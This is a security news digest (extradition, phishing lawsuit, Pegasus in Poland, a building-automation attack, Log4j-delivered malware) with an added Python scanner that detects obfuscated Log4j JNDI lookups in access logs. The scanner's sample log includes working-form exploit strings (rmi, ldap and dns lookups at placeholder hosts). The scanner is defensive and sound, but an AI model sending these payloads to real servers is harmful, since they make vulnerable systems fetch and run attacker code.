Justice Department Extradites Kremlin-Linked Hacker Accused of Stealing Earnings Information
Meta sues 39,000 phishing sites' operator, US and UK send cyberwarfare experts to Ukraine, NSO spyware used against top Polish opposition figures, German automation company crippled by attack, more
The U.S. Justice Department announced it had extradited from Switzerland a Kremlin-linked Russian national, Vladislav Klyushin, on charges that he participated in a scheme to hack and steal corporate earnings information about Tesla Inc., Roku Inc., and others, earning tens of millions of dollars in illegal profits.
Klyushin, also known as “Vladislav Kliushin,” was arrested in Sion, Switzerland on March 21, 2021, and was extradited to the United States on December 18. Klyushin was charged alongside four other Russian nationals, Ivan Ermakov, Nikolai Rumiantcev, Mikhail Vladimirovich Irzak, and Igor Sergeevich Sladkov, who remain at large. Ermakov, a former member of Russia’s military intelligence agency, was previously and separately charged with hacking crimes in 2018 in former special counsel Robert Mueller’s investigation into Russian interference in the 2016 U.S. presidential election. (Aruna Viswanatha and Dustin Volz / Wall Street Journal)
Related: The Record, Bloomberg, Justice.gov, SEC.gov, CNN, Bloomberg Law, Dark Reading, VOA News, Gizmodo, The Register - Security, Reuters, STL.News, IT News, BusinessWorld, NDTV Gadgets360.com, CyberNews


Meta, the parent company for Facebook, Instagram, and WhatsApp, filed a lawsuit today in a California court against the operators of more than 39,000 phishing sites hosted through the Ngrok service.
Meta seeks a court injunction and damages of at least $500,000 from the operators of these sites, even before they are identified. The suit alleges the group built the phishing sites on their own local systems and then exposed them through Ngrok, a localhost-to-internet relay service that lets developers publish a locally hosted site under the ngrok.io domain. According to the suit, the group then spread links to these ngrok.io domains to victims and collected the account credentials entered on them. (Catalin Cimpanu / The Record)
Related: Fossbytes, CNET, The Hacker News, Infosecurity Magazine, The Sun
According to roughly a dozen officials, the United States and Britain have quietly dispatched cyberwarfare experts to Ukraine to prepare the country to confront cyberattacks against the electric grid, the banking system, and other critical components of Ukraine’s economy and government as Russian president Vladimir Putin plans another incursion into the country.
Officials briefed on the intelligence say that if Putin does launch a cyberattack, either as a stand-alone action or as a precursor to a physical-world attack, it will most likely come after Orthodox Christmas, at the end of the first week of January. (David E. Sanger and Julian E. Barnes / New York Times)

Julian E. Barnes @julianbarnes
NEW: Could Putin launch a cyberattack on Ukraine ahead/instead of a real-world strike? US and UK are trying to support Ukraine's cyber defenses--though plugging the holes in Kyiv's systems is an impossible task. New with @SangerNYT https://t.co/CRjQdDh7FL

Researchers at the University of Toronto-based Citizen Lab confirmed that the cell phones of two top Polish opposition figures, lawyer Roman Giertych and prosecutor Ewa Wrzosek, were infected with Pegasus spyware made by the U.S.-sanctioned Israeli firm NSO Group.
A Polish state security spokesperson would neither confirm nor deny whether the government ordered the hacks or is an NSO customer. Citizen Lab previously detected multiple infections in Poland dating from November 2017, although it didn’t identify individual victims then. (Frank Bajak and Vanessa Gera / Associated Press)
Related: Hamodia



Eva @evacide
Just in case you think NSO Group's Pegasus is only being used to target opposition figures in MENA or LatAm, here's Poland: https://t.co/pVafsSCLJb

Researchers at Limes Security say that a German automation company suddenly lost contact with hundreds of building automation system (BAS) devices (light switches, motion detectors, shutter controllers, and others) after a rare cyberattack locked the company out of a BAS it had built for an office building client.
The researchers discovered that three-quarters of the BAS devices in the office building network had been mysteriously purged of their operating system and applications and locked down with the system's own digital security key, which was under the attackers' control. The firm had to revert to manually flipping on and off the central circuit breakers to power on the lights in the building until Limes devised a way to recover the key. The motive behind the attack could have been a failed ransomware incident or simply cyber vandalism. (Kelly Jackson Higgins / Dark Reading)
Related: Limes Security


French video game maker Ubisoft said that a misconfiguration in its IT infrastructure exposed gamer data for its Just Dance video game series players.
A Ubisoft spokesperson said the exposed data was limited to ‘technical identifiers,’ which include GamerTags, profile IDs, Device IDs, and Just Dance videos that were recorded and uploaded to be shared publicly with the in-game community and on users’ social media profiles. (Catalin Cimpanu / The Record)
Researchers at Cryptolaemus warned that the Log4j vulnerability is now being exploited to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.
The attackers use the RMI (Remote Method Invocation) variant of the Log4j JNDI exploit to force a vulnerable application to fetch and execute a Java class from an attacker-controlled server. On Linux hosts, the resulting Meterpreter session lets the attackers connect to the compromised server and run commands remotely to move laterally on the network, steal data, or deploy ransomware. All organizations should scan for applications that use vulnerable Log4j versions and update them to the latest release. (Lawrence Abrams / Bleeping Computer)
Related: Venture Beat, Heimdal Security Blog
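The exploit chain above starts with a single string, `${jndi:rmi://...}`, landing in any field Log4j logs, and attackers hide the literal `jndi:` behind nested lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`) and URL encoding. The following is an added example, not code from Cryptolaemus, Bleeping Computer, or the Log4j project: a small triage scanner that undoes those layers the way Log4j's lookup interpolator would, then reports the scheme (rmi, ldap, dns) of every JNDI lookup it finds. The log lines are constructed for the example, and the 198.51.100.0/24 addresses are documentation-range placeholders.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body that contains no nested "${", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _resolve_lookup(body: str) -> str:
    """Evaluate one innermost lookup the way the vulnerable Interpolator would,
    for the handful of lookups attackers use as obfuscation."""
    if ":-" in body:
        # "${key:-default}": an unresolvable key falls back to the default,
        # so ${::-j} and ${env:NOPE:-j} both evaluate to "j".
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    key = prefix.lower()
    if sep and key == "lower":
        return rest.lower()
    if sep and key == "upper":
        return rest.upper()
    # Any other lookup (${hostName}, ${date:...}) is replaced by inert text so
    # it is not matched again on the next pass.
    return "<" + body + ">"


def find_jndi_lookups(text: str, max_steps: int = 200) -> list:
    """Return the URI of every JNDI lookup in text after undoing URL encoding
    and the nesting used to hide the literal string "jndi:"."""
    work = unquote(text)
    found = []
    for _ in range(max_steps):  # bound the work done on adversarial input
        m = _INNERMOST.search(work)
        if m is None:
            break
        body = m.group(1)
        # Log4j matches lookup prefixes case-insensitively, so ${JnDi:...} counts.
        if body[:5].lower() == "jndi:":
            found.append(body[5:])
            repl = "<jndi>"
        else:
            repl = _resolve_lookup(body)
        work = work[:m.start()] + repl + work[m.end():]
    return found


def scheme_of(uri: str) -> str:
    """JNDI provider scheme of a lookup URI: rmi, ldap, ldaps, dns, ..."""
    return uri.partition(":")[0].lower()


def scan_log(lines) -> list:
    """Scan access-log lines; one hit per JNDI lookup, with 1-based line number."""
    hits = []
    for n, line in enumerate(lines, 1):
        for uri in find_jndi_lookups(line):
            hits.append({"line": n, "scheme": scheme_of(uri), "uri": uri})
    return hits


# Constructed sample: a clean request, a plain RMI payload in the path, a
# nested/obfuscated LDAP payload in the User-Agent, and a URL-encoded DNS probe.
SAMPLE_LOG = [
    '10.0.0.7 - - [20/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Dec/2021:10:01:14 +0000] "GET /${jndi:rmi://198.51.100.23:1099/Basic/Command} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [20/Dec/2021:10:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-l}dap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [20/Dec/2021:10:01:16 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fcanary.example%2Fx%7D HTTP/1.1" 200 33 "-" "x"',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"line {h['line']}: {h['scheme']} lookup -> {h['uri']}")
```

This catches the common nesting and encoding tricks, not every possible one, so treat a clean scan as triage rather than proof of safety; an `rmi://` or `ldap://` hit pointing at an unfamiliar host is a strong indicator that the request was an exploitation attempt, while `dns://` hits are usually scanners checking whether the target performs lookups at all. The durable fix remains finding and upgrading the vulnerable Log4j copies.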
The Department of Justice announced that it had filed a civil complaint in San Diego federal court to return more than $154 million allegedly stolen from Sony Life Insurance Company Ltd, a subsidiary of Sony, by one of its employees, Rei Ishii.
The complaint alleges that Ishii embezzled the funds from the company in May and diverted them to an account he controlled at a La Jolla bank. The U.S. Attorney's Office said Ishii moved the money by falsifying transaction instructions when the Tokyo-based company attempted to transfer funds between its own accounts. Investigators traced the money, which had been converted to Bitcoin, and obtained the private key to the bitcoin address Ishii used, allowing the funds to be recovered, following a joint investigation with Japan's National Police Agency, the Tokyo Metropolitan Police Department, the Tokyo District Public Prosecutors Office, and JPEC (the Japan Prosecutors unit on Emerging Crimes). (City News Service)
Related: Justice Department
Bangalore, India-based Wipro announced it would acquire Austin, TX-based cybersecurity consulting company Edgile for $230 million.
The company will develop Wipro CyberTransform, an integrated suite that will help enterprises enhance boardroom governance of cybersecurity risk, in collaboration with Edgile. (Rishabh Bhatnagar / Bloomberg Quint)
Related: Business Wire Technology: Security News, Times of India